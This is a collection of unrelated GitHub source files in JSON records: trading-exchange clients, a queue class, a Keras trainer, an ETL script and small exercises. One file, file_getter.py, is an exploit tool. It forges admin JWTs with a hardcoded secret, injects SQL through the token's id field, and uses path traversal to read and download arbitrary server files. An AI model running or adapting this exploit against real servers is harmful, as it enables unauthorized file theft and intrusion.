status_code=200)\n","repo_name":"jan-g/faastm","sub_path":"slacker/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"8409312981","text":"import requests\nimport jwt\nimport re\nimport argparse\nimport time\n\n##############################################\n###################CONFIG#####################\nURL = \"http://127.0.0.1\"\nfilename_to_upload = \"badfile.php\"\nfile_content = \"\"\nuser_id = 31337\nis_public = 0\n\ntimeout = 2\n\nlogin = \"admin\"\nmail = \"admin\"\nrole = \"admin\"\nip = \"127.0.0.1\"\n##############################################\n\nurl = f\"{URL}/modules/upload.php\"\n\nfiles = {\n 'image': (filename_to_upload,file_content, 'image/jpeg')\n}\n\ndef generate_token(id):\n encoded_jwt = jwt.encode({\"id\": f\"{id}\",\n \"login\": f\"{login}\",\n \"mail\": f\"{mail}\",\n \"role\": f\"{role}\",\n \"ip\": f\"{ip}\"},\n \"supersecret\", algorithm=\"HS256\")\n return encoded_jwt\n\ndef get_last_id():\n encoded_jwt = generate_token(user_id)\n req = requests.get(f\"{URL}\", headers={\"Cookie\": f\"user_token={encoded_jwt}\"})\n images = re.findall(r\"image\\.php\\?id=[0-9]{1,7}\",req.text)\n last_id = str(images[len(images)-1])[13:]\n return last_id\n\n\ndef interactive(jwt_print, file_print, file_download,add_path):\n print(\"=\" * 50)\n print()\n while True:\n file = str(input('file > '))\n if add_path:\n file = \"../../../../../..\" + file\n encoded_jwt = generate_token(f\"4), ('{file}', {is_public}, {user_id}\")\n requests1 = requests.post(url, headers={\"Cookie\": f\"user_token={encoded_jwt}\"}, files=files)\n\n if \"\\\"error\\\":false\" in requests1.text:\n print(\">>> File uploaded\")\n else:\n print(\">>> File not uploaded\")\n break\n\n last_id = get_last_id()\n usual_jwt = generate_token(f'{user_id}')\n\n try:\n requests2 = requests.get(f'{URL}/image.php?id={last_id}',\n headers={'Cookie': f'user_token={usual_jwt}'}, timeout=timeout)\n if '403' in requests2.text:\n print('>>> File not found')\n else:\n print('>>> File exist!' + \"\\n\")\n print(f'>>> URL: {URL}/image.php?id={last_id}' + \"\\n\")\n\n if jwt_print:\n print(f'>>> jwt: {usual_jwt}' + \"\\n\")\n if file_print:\n print(\">\"*10 + \" FILE CONTENT \" + \"<\"*10 + \"\\n\")\n print(requests2.text)\n print(\">\"*19 + \"<\"*19 + \"\\n\")\n if file_download:\n print(\">>> File downloaded\" + \"\\n\")\n f = open(file.replace('/','').replace('.',''), 'w')\n f.write(requests2.text)\n f.close()\n\n except BaseException:\n print('>>> File exist but we don`t have permissions to read')\n print()\n\ndef fuzz(list,jwt_print, file_print, file_download,add_path):\n print(\"=\" * 50)\n print()\n with open(list) as f:\n lines = f.readlines()\n lines = [line.rstrip() for line in lines]\n lines = [line for line in lines]\n for line in lines:\n if add_path:\n file = \"../../../../../..\" + line\n else:\n file = line\n encoded_jwt = generate_token(f\"4), ('{file}', {is_public}, {user_id}\")\n requests1 = requests.post(url, headers={\"Cookie\": f\"user_token={encoded_jwt}\"}, files=files)\n\n last_id = get_last_id()\n usual_jwt = generate_token(f'{user_id}')\n\n try:\n requests2 = requests.get(f'{URL}/image.php?id={last_id}',\n headers={'Cookie': f'user_token={usual_jwt}'}, timeout=timeout)\n if requests2.status_code == 503:\n print(\"503 error\")\n\n elif '403' in requests2.text:\n pass\n print(f'>>> File {file} not found')\n\n elif len(requests2.text) > 1:\n print(f'>>> File {file} exist!' + \"\\n\")\n print(f'>>> URL: {URL}/image.php?id={last_id}' + \"\\n\")\n\n if jwt_print:\n print(f'>>> jwt: {usual_jwt}' + \"\\n\")\n if file_print:\n print(\">\" * 10 + \" FILE CONTENT \" + \"<\" * 10 + \"\\n\")\n print(requests2.text)\n print(\">\" * 19 + \"<\" * 19 + \"\\n\")\n if file_download:\n print(\">>> File downloaded\" + \"\\n\")\n f = open(file.replace('/', '').replace('.', ''), 'w')\n f.write(requests2.text)\n f.close()\n\n except BaseException:\n print(f'>>> File {file} exist but we don`t have permissions to read')\n\n\n\n\n\n\n\n\n\ndef print_banner():\n print(\"\"\"\n ______ _ _ _____ _ _\n | ____(_) | / ____| | | | |\n | |__ _| | ___ | | __ ___| |_| |_ ___ _ __\n | __| | | |/ _ \\ | | |_ |/ _ \\ __| __/ _ \\ '__|\n | | | | | __/ | |__| | __/ |_| || __/ |\n |_| |_|_|\\___| \\_____|\\___|\\__|\\__\\___|_|\n\n This tool was created to exploit Arbitrary File\n Reading via SQL injection.\n \n \"\"\")\n\n\nhelp = \"\"\"\n MODES:\n --interactive Interactive mode to search for files manually\n --fuzz \"list.txt\" Fuzz mode to search for files from list \n INTERACTIVE MODE\n VERBOSITY OPTIONS: \n --jwt Prints JWT\n --printFile Prints file\n OTHER:\n --download Downloads file if it exists\n FUZZ MODE\n --addPath Add path traversal \"../../../../\"\n --help Print this page \n\"\"\"\n\n\nparser = argparse.ArgumentParser(add_help=False)\n\nparser.add_argument(\"--interactive\",action=\"store_true\")\nparser.add_argument(\"--fuzz\",default=\"\")\nparser.add_argument(\"--help\",action=\"store_true\")\nparser.add_argument(\"--jwt\",action=\"store_true\")\nparser.add_argument(\"--printFile\", action=\"store_true\")\nparser.add_argument(\"--download\", action=\"store_true\")\nparser.add_argument(\"--addPath\", action=\"store_true\")\n\nargs = parser.parse_args()\ninteractive_mode = args.interactive\nfuzz_mode = args.fuzz\njwt_print = args.jwt\nfile_print = args.printFile\nfile_download = args.download\nadd_path = args.addPath\nhelpme = args.help\n\nprint_banner()\n\nif (not (interactive_mode or fuzz_mode)) or helpme:\n print(help)\n quit()\n\nif interactive_mode:\n interactive(jwt_print, file_print, file_download,add_path)\n\nif fuzz_mode:\n fuzz(fuzz_mode,jwt_print, file_print, file_download,add_path)\n","repo_name":"MiichaelKlimenko/TestTaskTools","sub_path":"file_getter.py","file_name":"file_getter.py","file_ext":"py","file_size_in_byte":6604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"6537511450","text":"#!/usr/bin/env python3\n\n########################################################\n#\n# A simple middleware to submit a scan report\n# assessment results\n#\n# Usage:\n# python sar_etl.py [-s ] [-d ]\n#\n# Example:\n# python sar_etl.py eCXZbZwmBrtD5hgrJ8ptmJfvDA5vlDcc http://localhost:8888/ -s 132 -d f7b0d84e-397c-43de-bb1f-421afa467993\n# Accessing:\n# curl localhost:8888\n#\n#\n# Optional arguments:\n# -h, --help show this help message and exit\n# -d deployment uuid\n# -s system id\n# -v, --verbose output more information\n#\n################################################################\n\n# Parse command-line arguments\nimport click\n\n# Web stuff\nfrom http.server import HTTPServer, BaseHTTPRequestHandler\nfrom urllib import request, parse\n\n# System stuff\nimport os\nimport platform\nimport re\nimport signal\nimport sys\n\n# JSON and other data handling\nimport json\nimport random\nimport uuid\n\n# Default constants\nGOVREADYHOST = \"http://localhost:8000\"\nSPACER = \"\\n====\\n\"\n\n# Gracefully exit on control-C\nsignal.signal(signal.SIGINT, lambda signal_number, current_stack_frame: sys.exit(0))\n\n# Define a fatal error handler\nclass FatalError(Exception):\n pass\n\n# Define a halted error handler\nclass HaltedError(Exception):\n pass\n\n# Define a non-zero return code error handler\nclass ReturncodeNonZeroError(Exception):\n def __init__(self, completed_process, msg=None):\n if msg is None:\n # default message if none set\n msg = \"An external program or script returned an error.\"\n super(ReturncodeNonZeroError, self).__init__(msg)\n self.completed_process = completed_process\n\n# Commandline arguments\n@click.command()\n@click.argument('apikey', default=None)\n@click.argument('sar_url', default=None)\n@click.option('-s', default=None)\n@click.option('-d', default=None)\ndef main(apikey,sar_url, s, d):\n\n # Set system_id, deployment_uuid\n system_id = s\n deployment_uuid = d\n # deployment_id = 226\n\n #build query\n url_query = f\"?system_id={system_id}&deployment_uuid={deployment_uuid}\"\n\n # Get SAR from SAR Service\n print(SPACER)\n print(f\"Retrieving SAR from service: {sar_url}{url_query}\")\n handler = request.urlopen(f\"{sar_url}{url_query}\")\n sar = json.loads(handler.read().decode( 'utf-8' ));\n # print(sar)\n\n system_id = sar[\"metadata\"][\"system_id\"]\n\n if deployment_uuid is not None:\n d_uuid_uuid = uuid.UUID(f'urn:uuid:{deployment_uuid}')\n else:\n d_uuid_uuid = None\n # Submit sar data to GovReady-q API\n data = {\n \"system_id\": system_id,\n \"deployment_uuid\": d_uuid_uuid,\n \"sar_json\": json.dumps(sar)\n }\n\n from pprint import pprint\n # pprint(data)\n data = bytes( parse.urlencode( data ).encode() )\n\n # POST retrieved SAR data to GovReady-Q via API\n \"\"\"\n curl --header \"Authorization: \" \\\n -F \"name=test_sar_api\" \\\n -F \"system_id=86\" \\\n -F \"deployment_id=23\" \\\n -F \"data=@controls/data/test_data/test_sar1.json\" \\\n localhost:8000/api/v1/systems/86/assessment/new\n \"\"\"\n\n # Prepare headers\n headers = {\n \"Authorization\": f\"{apikey}\"\n }\n\n # Set GovReady URL\n gr_api_url = f\"{GOVREADYHOST}/api/v1/systems/{system_id}/assessment/new\"\n\n print(SPACER)\n print(f\"Posting retrieved SAR to: {gr_api_url}\")\n\n # Post to GovReady\n req = request.Request( gr_api_url, data=data, headers=headers, method=\"POST\" );\n response = request.urlopen(req)\n response.read()\n\n print(SPACER)\n print(response.read())\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"GovReady/govready-q","sub_path":"tools/simple_sar_server/sar_etl.py","file_name":"sar_etl.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","stars":160,"dataset":"github-code","pt":"67"} +{"seq_id":"41678250984","text":"import os\nimport time\nimport hmac\nimport base64\nimport hashlib\nimport requests\nimport urllib.parse\nfrom binance import Client\nfrom binance.helpers import round_step_size\nfrom dotenv import load_dotenv, find_dotenv\nimport Constants as C\nload_dotenv(find_dotenv('config.env'))\n\n\nclass CEX:\n def create_pair(self, base, quote):\n return f'{base}{quote}'\n\n\nclass Kraken(CEX):\n def __init__(self, key=None, secret=None, test=False):\n super().__init__()\n self.key = key\n self.secret = secret\n self.test = test\n if not key:\n self.key = os.environ['KRAKEN_KEY']\n if not secret:\n self.secret = os.environ['KRAKEN_SECRET']\n self.api_url = 'https://api.kraken.com'\n self.version = '0'\n\n def get_signature(self, urlpath, data):\n postdata = urllib.parse.urlencode(data)\n encoded = (str(data['nonce']) + postdata).encode()\n message = urlpath.encode() + hashlib.sha256(encoded).digest()\n\n mac = hmac.new(base64.b64decode(self.secret), message, hashlib.sha512)\n sigdigest = base64.b64encode(mac.digest())\n return sigdigest.decode()\n\n def make_auth_req(self, uri_path, data={}):\n data['nonce'] = self.gen_nonce()\n headers = {}\n headers['API-Key'] = self.key\n # get_kraken_signature() as defined in the 'Authentication' section\n headers['API-Sign'] = self.get_signature(uri_path, data)\n response = requests.post(\n (self.api_url + uri_path),\n headers=headers,\n data=data\n )\n return self.handle_response(response)\n\n def gen_nonce(self):\n return str(int(1000 * time.time()))\n\n def get_balance(self):\n access = 'private'\n endpoint = 'Balance'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n response = self.make_auth_req(url)\n for asset in response:\n response[asset] = float(response[asset])\n return response\n\n def get_asset_pair(self, pair):\n access = 'public'\n endpoint = 'AssetPairs'\n parts = [\n self.api_url,\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n params = {\n 'pair': pair\n }\n response = requests.get(url, params=params)\n result = self.handle_response(response)[pair]\n return result\n\n def order(self, base, quote, side, spend_ratio=1, test=False):\n pair = self.create_pair(base, quote)\n pair_info = self.get_asset_pair(pair)\n fee = self.get_fee(pair) / 100\n spend_ratio = spend_ratio - fee\n side = side.lower()\n access = 'private'\n endpoint = 'AddOrder'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n\n oflags = ['nompp']\n balance_label = base\n precision_label = 'lot_decimals'\n\n if side.upper() == C.BUY:\n oflags.append('viqc')\n balance_label = quote\n precision_label = 'cost_decimals'\n elif side.upper() != C.SELL:\n raise Exception('Need to specify BUY or SELL side for order')\n\n balance = self.get_balance()[balance_label]\n amount = spend_ratio * balance\n precision = pair_info[precision_label]\n volume = \"{:0.0{}f}\".format(amount, precision)\n\n data = {\n 'ordertype': 'market',\n 'type': side.lower(),\n 'pair': pair,\n 'oflags': ','.join(oflags),\n 'volume': volume,\n 'validate': test or self.test\n }\n response = self.make_auth_req(url, data)\n return response\n\n def handle_response(self, response):\n response = response.json()\n error = response['error']\n if error:\n raise Exception(error)\n return response['result']\n\n def get_order(self, order_id):\n access = 'private'\n endpoint = 'QueryOrders'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n 'txid': order_id,\n 'trades': True\n }\n response = self.make_auth_req(url, data)\n order = response[order_id]\n order['order_id'] = order_id\n return order\n\n def get_trades(self, trade_ids):\n access = 'private'\n endpoint = 'QueryTrades'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n 'txid': ','.join(trade_ids),\n 'trades': True\n }\n response = self.make_auth_req(url, data)\n trades = [\n {\n **response[trade_id],\n **{'trade_id': trade_id}\n }\n for trade_id in trade_ids\n ]\n return trades\n\n def standardize_order(self, order, trades):\n std = {}\n std['symbol'] = order['descr']['pair']\n std['orderId'] = order['order_id']\n std['transactTime'] = int(\n (order['closetm'] + order['opentm']) / 2 * 1000)\n std['price'] = round(float(order['price']), 10)\n side = order['descr']['type'].upper()\n origQty = float(order['vol'])\n if side == C.BUY:\n # other test would be [if 'viqc' in order['oflags'].split(','):]\n origQty = round(origQty / std['price'], 10)\n std['origQty'] = origQty\n std['executedQty'] = float(order['vol_exec'])\n std['cummulativeQuoteQty'] = round(\n std['price'] * std['executedQty'], 10)\n std['status'] = order['status'].upper()\n std['type'] = order['descr']['ordertype'].upper()\n std['side'] = side\n\n def standardize_trade(trade):\n std_trade = {}\n std_trade['price'] = str(round(float(trade['price']), 10))\n std_trade['qty'] = trade['vol']\n std_trade['commission'] = trade['fee']\n std_trade['tradeId'] = trade['trade_id']\n return std_trade\n fills = [standardize_trade(trade) for trade in trades]\n std['fills'] = fills\n return std\n\n def get_test_side(self, base, quote):\n pair = f'{base}{quote}'\n balances = self.get_balance()\n base_bal = balances[base]\n quote_bal = balances[quote]\n price = self.get_price(pair)\n base_val = base_bal * price\n side = 'buy' if quote_bal > base_val else 'sell'\n return side\n\n def get_fee(self, pair):\n access = 'private'\n endpoint = 'TradeVolume'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n \"pair\": pair\n }\n response = self.make_auth_req(url, data)\n fee = float(response['fees'][pair]['fee'])\n return fee\n\n def get_ticker(self, pair=None):\n access = 'public'\n endpoint = 'Ticker'\n parts = [\n '',\n self.version,\n access,\n endpoint,\n ]\n url = '/'.join(parts)\n data = {\n \"pair\": pair\n } if pair else {}\n response = self.make_auth_req(url, data)\n return response\n\n def get_price(self, pair):\n ticker = self.get_ticker(pair)\n price = float(ticker[pair]['c'][0])\n return price\n\n\nclass Binance(CEX):\n def __init__(self, key=None, secret=None, testnet=False):\n super().__init__()\n self.key = key\n self.secret = secret\n if not key:\n if testnet:\n self.key = os.environ['BINANCE_TESTNET_KEY']\n else:\n self.key = os.environ['BINANCE_KEY']\n if not secret:\n if testnet:\n self.secret = os.environ['BINANCE_TESTNET_SECRET']\n else:\n self.secret = os.environ['BINANCE_SECRET']\n self.client = Client(self.key, self.secret, testnet=testnet, tld='us')\n\n def order(self, base, quote, side, spend_ratio=1, test=False):\n # fee is 0.1%, so max spend_ratio is 99.9%\n spend_ratio = spend_ratio - C.BINANCE_FEE\n pair = self.create_pair(base, quote)\n side = side.upper()\n order_type = self.client.ORDER_TYPE_MARKET\n params = {'symbol': pair, 'type': order_type}\n symbol_info = self.client.get_symbol_info(pair)\n\n if side == C.SELL:\n side = self.client.SIDE_SELL\n balance_label = base\n quantity_label = 'quantity'\n filters = symbol_info['filters']\n for filter in filters:\n if filter['filterType'] == 'LOT_SIZE':\n step_size = float(filter['stepSize'])\n elif side == C.BUY:\n side = self.client.SIDE_BUY\n balance_label = quote\n quantity_label = 'quoteOrderQty'\n precision = int(symbol_info['quoteAssetPrecision'])\n else:\n raise Exception('Need to specify BUY or SELL side for order')\n\n balance = float(self.client.get_asset_balance(balance_label)['free'])\n amount = spend_ratio * balance\n\n if side == C.BUY:\n quantity = \"{:0.0{}f}\".format(amount, precision)\n else:\n quantity = round_step_size(amount, step_size)\n\n params[quantity_label] = quantity\n\n params['side'] = side\n fx = self.client.create_test_order if test else self.client.create_order\n\n order = fx(**params)\n return order\n\n# write script that gets most recent data at 9pm est\n# predicts using model\n# writes that back to predict.csv\n# write successful orders to binance.csv\n","repo_name":"suchak1/hyperdrive","sub_path":"hyperdrive/Exchange.py","file_name":"Exchange.py","file_ext":"py","file_size_in_byte":9884,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"67"} +{"seq_id":"29691454966","text":"import sys\nimport time\n\nclass Queue():\n\n # Initialize\n def __init__(self, elements, visualize):\n\n start_time = time.time()\n\n self.size = len(elements)\n self.elements = elements\n \n # Settings\n self.visualize = visualize\n self.visualize_count = 0\n self.set_maximum_size = float('INF')\n self.set_allow_str = True\n\n end_time = time.time()\n time_taken = end_time - start_time\n\n if self.visualize:\n self.display_visualize_message(\"Queue has been created with the elements: \" + str(elements), time_taken)\n \n\n def __str__(self):\n return str(self.elements)\n\n def __repr__(self):\n return str(self.elements)\n\n def display_visualize_message(self, message, time_taken):\n self.visualize_count += 1\n print(self.visualize_count, \" - \" , message)\n for index, element in enumerate(self.elements):\n if self.size == 1:\n print(\"Front <- | \", end = \"\")\n print(str(element), end = \"\")\n print(\" | <- Rear\", end = \"\")\n print()\n elif index == 0:\n print(\"Front <- | \", end = \"\")\n print(str(element), end = \"\")\n elif index == self.size - 1:\n print(\" | \" + str(element), end = \"\")\n print(\" | <- Rear\", end = \"\")\n print()\n else:\n print(\" | \" + str(element), end = \"\")\n\n print(\"Memory Usage: \" + str(sys.getsizeof(self.elements)))\n print(\"Time Taken: \" + str(time_taken))\n\n # Settings of the queue\n def set(\n self,\n visualize = False,\n maximum_size = float('INF'),\n allow_str = True\n ):\n self.visualize = visualize\n self.set_maximum_size = maximum_size\n self.set_allow_str = allow_str\n pass\n \n # Find the element on the index\n def index(self, position):\n if(position >= self.size or position < 0):\n print(\"Index out of Range\")\n else:\n\n if self.visualize:\n self.display_visualize_message(\"Element at the position: \" + str(position) + \" is \" + str(self.elements[position]))\n\n return self.elements[position]\n \n # Find the index of the element\n def find(self, element):\n try:\n\n start_time = time.time()\n position = self.elements.index(element)\n end_time = time.time()\n time_taken = end_time - start_time\n\n if self.visualize:\n self.display_visualize_message(\"The element \" + str(element) + \" is found at the position: \" + str(position), time_taken)\n\n except ValueError:\n print(\"Value not present.\")\n position = -1\n \n return position\n\n # Add the element to the queue\n def add(self, position = -1, element = None):\n\n start_time = time.time()\n\n # CHECK SETTINGS\n # Maximum size\n if(self.set_maximum_size != float('INF')):\n if(self.size >= self.set_maximum_size):\n return \"Maximum size exceeded.\"\n \n # Allow Str\n if(not self.set_allow_str):\n if(isinstance(element, str)):\n return \"String is not allowed.\"\n\n # If no element is given, but position is given, then take position as element\n if(element == None and position!=-1):\n element = position\n position = self.size\n elif(element == None):\n print('Please pass the element to insert.')\n return None\n\n # If no position is given, add it to the last\n if(position == -1):\n position = self.size\n\n if(self.size == 0):\n self.elements = [0] * position\n self.elements.append(element)\n else:\n if(position > self.size):\n self.elements += [0] * (position - self.size)\n self.elements.append(element)\n self.size += (position - self.size) \n else:\n self.elements.insert(position, element)\n self.size += 1\n\n end_time = time.time()\n time_taken = end_time - start_time\n\n if self.visualize and element is not None:\n self.display_visualize_message(\"The element \" + str(element) + \" is inserted in the position: \" + str(position), time_taken)\n\n\n # Add the element in the position and remove the other element\n def add_and_remove(self, position = -1, element = None):\n\n # If no element is given\n if(element == None):\n print('Please pass the element to insert.')\n return None\n\n # If no position is given, add it to the last\n if(position == -1):\n position = self.size\n\n if(self.size == 0):\n self.elements = [0] * position\n self.elements.append(element)\n else:\n if(position < self.size):\n del self.elements[position]\n self.elements.insert(position, element)\n\n self.size += 1\n\n\n def add_first(self, element):\n self.add(0, element)\n\n def add_last(self, element):\n self.add(self.size, element)\n\n # Remove the element from the queue\n def remove(self, position = 0):\n if(position >= self.size or position < 0):\n print(\"Index Out of Range\")\n return -1\n else:\n element_to_return = self.elements[position]\n self.elements.pop(position)\n self.size -= 1\n\n return element_to_return\n\n def remove_first(self):\n return self.remove(0)\n\n def remove_last(self):\n return self.remove(self.size - 1)\n\n def display(self):\n print(self.elements)\n\n def get_elements(self):\n return self.elements\n \n def get_size(self):\n return self.size\n\n # Get the maximum element from the queue\n def get_max(self):\n maximum_value = -float('INF')\n for element in self.elements:\n if(isinstance(element, int)):\n if(element > maximum_value):\n maximum_value = element\n if(maximum_value == float('INF')):\n maximum_value = \"No integer is present.\"\n return maximum_value\n \n # Get the minimum element from the queue\n def get_min(self):\n minimum_value = float('INF')\n for element in self.elements:\n if(isinstance(element, int)):\n if(element < minimum_value):\n minimum_value = element\n if(minimum_value == float('INF')):\n minimum_value = \"No integer is present.\"\n return minimum_value\n\n # Get the sum of all the elements from the queue\n def get_sum(self):\n sum_value = 0\n for element in self.elements:\n if(isinstance(element, int)):\n sum_value += element\n return sum_value\n\n # Get the average of all the elements from the queue\n def get_avg(self):\n sum_value = 0\n count_value = 0\n for element in self.elements:\n if(isinstance(element, int)):\n sum_value += element\n count_value += 1\n avg_value = 0\n if(count_value != 0):\n avg_value = sum_value/count_value\n return avg_value\n\n # Reverse the queue\n def reverse(self, inplace = False):\n reversed_elements = []\n for element in self.elements[::-1]:\n reversed_elements.append(element)\n if(inplace):\n self.elements = reversed_elements\n return reversed_elements\n\n # Sort the queue\n def sort(self, desc = False, inplace = False):\n sorted_elements = []\n sorted_numbers = []\n sorted_strings = []\n for element in self.elements:\n if(isinstance(element, int)):\n sorted_numbers.append(element)\n elif(isinstance(element, str)):\n sorted_strings.append(element)\n else:\n pass\n sorted_numbers = sorted(sorted_numbers)\n sorted_strings = sorted(sorted_strings)\n sorted_elements.extend(sorted_numbers)\n sorted_elements.extend(sorted_strings)\n # Convert to descending\n if(desc):\n sorted_elements = list(reversed(sorted_elements))\n if(inplace):\n self.elements = sorted_elements\n return sorted_elements\n\n # Map all the values to the function\n def map(self, function = None, inplace = False):\n if(not function):\n print(\"Function parameter is missing.\")\n return None\n mapped_elements = []\n for element in self.elements:\n value = function(element)\n mapped_elements.append(value)\n if(inplace):\n self.elements = mapped_elements\n return mapped_elements\n\n\n# CREATE A QUEUE\ndef queue(elements = [], visualize = False):\n return Queue(elements, visualize)","repo_name":"fazil2003/easydsi","sub_path":"easydsi/queue/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8982,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"67"} +{"seq_id":"41845507193","text":"#!/usr/bin/python2.7\n# encoding: utf-8\nfrom __future__ import division\n\nimport os \nimport cPickle as pkl\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef main(input_dir):\n\n #Gridded data\n #in space\n #xmax = 2000.0\n #xmin = 0.0\n #Dx = 200\n #ymax = 1000\n #ymin = 0.0\n #Dy = 100\n \n #high density\n xmax = 1500.0\n xmin = 0.0\n Dx = 20\n ymax = 230\n ymin = 0.0\n Dy = 20\n \n x = np.linspace(xmin, xmax, (xmax-xmin)//Dx)\n y = np.linspace(ymin, ymax,(ymax-ymin)// Dy)\n X, Y = np.meshgrid(x, y)\n #and time\n tmax = 12.0*60*60\n tmin = 0.0\n Dt = 300\n t = np.linspace(tmin, tmax, Dt)\n period = tmax\n \n umax = 3.1\n vmax = 0.0\n sshmax = 1.0\n \n #time dependent\n #phase = np.pi/2.0\n #U = np.ones((t.shape[0],X.shape[0],X.shape[1]))\n #V = np.ones((t.shape[0],Y.shape[0],Y.shape[1]))\n #SSH = np.ones((t.shape[0],Y.shape[0],Y.shape[1]))\n #I = 0\n #for i in t:\n # U[I,:,:] = umax * np.cos(2.0*np.pi*(i/period))\n # V[I,:,:] = vmax * np.cos(2.0*np.pi*(i/period))\n # SSH[I,:,:] = sshmax * np.cos(2.0*np.pi*(i/period)+phase)\n # I += 1 \n \n #time independent\n #V = np.ones(X.shape)\n #for i in range(X.shape[0]):\n # V[i,:] = vmax * np.cos(2.0*np.pi*(i/(X.shape[0]/2.0)))\n V = vmax * np.ones(X.shape)\n \n #U = np.ones(Y.shape)\n #for i in range(Y.shape[0]):\n # U[i,:] = umax * np.cos(2.0*np.pi*(i/Y.shape[0]))\n U = umax * np.ones(Y.shape)\n \n SSH = sshmax * np.ones(Y.shape)\n \n #Plot quiver\n# plt.figure()\n# #Q = plt.quiver(X, Y, U[0,:,:], V[0,:,:], scale=100.0)\n# Q = plt.quiver(X, Y, U, V, scale=100.0)\n# #plt.figure() \n# #P1 = plt.plot(t, U[:,0,0].T)\n# #P2 = plt.plot(t, SSH[:,0,0].T)\n# plt.show()\n \n ##Default values\n #Bathymetry\n bathy = -60.0 * np.ones(X.shape)\n #Turbulence intensity\n ti = 0.05 * np.ones(X.shape)\n \n #Save as pickle\n data = {}\n data['TI'] = ti\n data['X'] = x\n data['Y'] = y\n data['U'] = U\n data['V'] = V\n data['SSH'] = SSH\n data['bathy'] = bathy\n fpath = os.path.join(input_dir, 'simple_inputs.p')\n f = file(fpath, 'wb')\n pkl.dump(data, f, protocol=pkl.HIGHEST_PROTOCOL)\n f.close()\n\nif __name__ == '__main__':\n \n input_dir = 'inputs_tidal'\n main(input_dir)","repo_name":"DTOcean/dtocean-hydrodynamics","sub_path":"examples/make_analytical_inputs.py","file_name":"make_analytical_inputs.py","file_ext":"py","file_size_in_byte":2332,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"67"} +{"seq_id":"27367149779","text":"\"\"\"Train MLP Model\nUsing MLP Model to Train Picture Recognition Model.\n\"\"\"\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout\n\nimport numpy as np\n\n\n# 设定 np 乱数种子\nnp.random.seed(10)\n\n# 载入训练资料集\nn = 10000\nimg_feature = np.fromfile(\"./your/image/training/array.features\", dtype=np.uint8)\nimg_feature = img_feature.reshape(n, 30, 30, 3)\nimg_label = np.fromfile(\"./your/image/training/array.labels\", dtype=np.uint8)\nimg_label = img_label.reshape(n, 1)\n\n# 打散资料集\nindexs = np.random.permutation(img_label.shape[0])\nrand_img_feature = img_feature[indexs]\nrand_img_label = img_label[indexs]\n\n# 资料正规化\n# 将 feature 数字转换为 0~1 的浮点数,能加快收敛,并提升预测准确度\n# 把维度 (n,30,30,3) => (n, 30*30*3)后,再除255\nimg_feature_normalized = rand_img_feature.reshape(n, 30*30*3).astype('float32') / 255\n\n# 将 label 转换为 onehot 表示\nimg_label_onehot = np_utils.to_categorical(rand_img_label)\n\n# 建立一个线性堆叠模型\nmodel = Sequential()\n\n# 建立输入层与隐藏层\nmodel.add(Dense(input_dim = 30*30*3, # 输入层神经元数\n units = 1000, # 隐藏层神经元数\n kernel_initializer = 'normal', # 权重和误差初始化方式:normal,使用常态分布产生出始值\n activation = 'relu')) # 激活函数:relu函数,忽略掉负数的值\n\n# 建立输出层\nmodel.add(Dense(units = 2, # 输出层神经元数 (即[True, False])\n kernel_initializer = 'normal',\n activation = 'softmax')) # 激活函数:softmax函数,使输出介于 0~1 之间\n\n# 定义训练方式\nmodel.compile(loss='categorical_crossentropy', # 损失函数\n optimizer='adam', # 最佳化方法\n metrics=['accuracy']) # 评估方式:准确度\n\n# 显示模型摘要\nprint(model.summary())\n\n# 开始训练模型\ntrain_history = model.fit(x=img_feature_normalized, # 指定 feature\n y=img_label_onehot, # 指定 label \n validation_split=0.2, # 分80%训练,20%验证\n epochs=5, # 执行 5 次训练\n batch_size=200, # 批次训练,每批次 200 笔资料\n verbose=2) # 显示训练过程\n\n# 储存模型\nmodel.save(\"./your/image/training/models.dat\")","repo_name":"yehuh/ImageRecognizer","sub_path":"Train_Image.py","file_name":"Train_Image.py","file_ext":"py","file_size_in_byte":2394,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29862060152","text":"import sys\nfrom collections import deque\n\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\narr = deque([i + 1 for i in range(N)])\nlocation = list(map(int, input().split()))\ncnt = 0\n\nfor loc in location:\n while True:\n index = arr.index(loc)\n mid_index = len(arr) // 2\n\n if index <= mid_index:\n if arr[0] == loc:\n arr.popleft() # 1번 행동\n break\n else:\n arr.append(arr.popleft()) # 2번 행동\n cnt += 1\n\n else:\n if arr[-1] == loc:\n arr.pop() # 1번 + 3번 행동\n cnt += 1\n break\n\n else:\n arr.appendleft(arr.pop()) # 3번 행동\n cnt += 1\n\nprint(cnt)\n","repo_name":"Sora-CodingTestStudy/our-code","sub_path":"queue/yoona/회전하는_큐.py","file_name":"회전하는_큐.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16534178083","text":"# def square(number):\n# sqr_num = number * number\n# return sqr_num\n\n# def add_two_numbers(num1, num2):\n# sum = num1 + num2\n# return sum\n\n# def cube(num):\n# return num ** 3\n\n# print(cube(3))\n\n\n# def multiply(num1, num2):\n# return num1 * num2\n\n# print(multiply(2,5))\n\n''' while loop '''\n# n = 1\n# while (n < 5):\n# print('n =', n)\n# n = n + 1\n# print('loop 